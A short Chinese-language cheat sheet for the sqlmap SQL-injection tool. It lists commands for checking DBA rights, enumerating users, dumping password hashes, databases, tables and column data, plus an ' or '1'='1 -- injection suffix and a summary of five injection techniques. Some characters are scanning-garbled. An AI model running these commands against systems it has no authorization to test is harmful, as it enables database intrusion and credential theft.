SQLmap常用语法:
1.判断当前用户是否是dba(数据库管理员):
python sqlmap.py -u "url" --is-dba
2.--users:列出数据库管理系统用户:
python sqlmap.py -u "url" --users
3.--passwords:数据库用户密码(hash)
python sqlmap.py -u "url" --passwords
python sqlmap.py -u "url" --passwords -U sa
4.查看用户权限
python sqlmap.py -u "url" --privileges
python sqlmap.py -u "url" --privileges -U postgres
5.--dbs可以利用的数据库
python sqlmap.py -u "url" --dbs
6.--tables列数据库表
python sqlmap.py -u "url" --tables -D "db_name"
-D:指定数据库名称
7.--columns查看列名
python sqlmap.py -u "url" --columns -T "table_name" -D "db_name"
8.--dump -C "column1_name,column2_name,column3_name" 查询字段数据
python sqlmap.py -u "url" --dump -C "column1_name,column2_name" -T "table_name" -D "db_name"
--prefix "'" --suffix " or '1'='1 -- "
sqlmap -u "sssslog.asp" --data "user_id=eee&password=eee&Submit=%B5%C7+%C2%BC"
当给sqlmap这么一个url的时候,它会:
1 、判断可注入的参数
2 、判断可以用那种SQL 注入技术来注入
3 、识别出哪种数据库
4、根据用户选择, 读取哪些数据
sqlmap支持五种不同的注入模式:
1 、基于布尔的盲注, 即可以根据返回页面判断条件真假的注入:
2 、基于时间的盲注, 即不能根据页面返回内容判断任何信昷, 用条件语句查看时间延迟语句是否执行( 即页面返回时间是否增加〕来判断:
3 、基于报错注入, 即页面会返回错误信昷, 或者把注入的语句的结果亘接返回在页面中:
4、 联合查询注入, 可以亻吏用union 的情况下的注入:
5 、堆查询注入, 可以同时执行多条语句的执行时的注入:
以下是我在网上找到的关于sqlmap写的比较好的文章:
https://www.freebuf.com/sectool/179035.html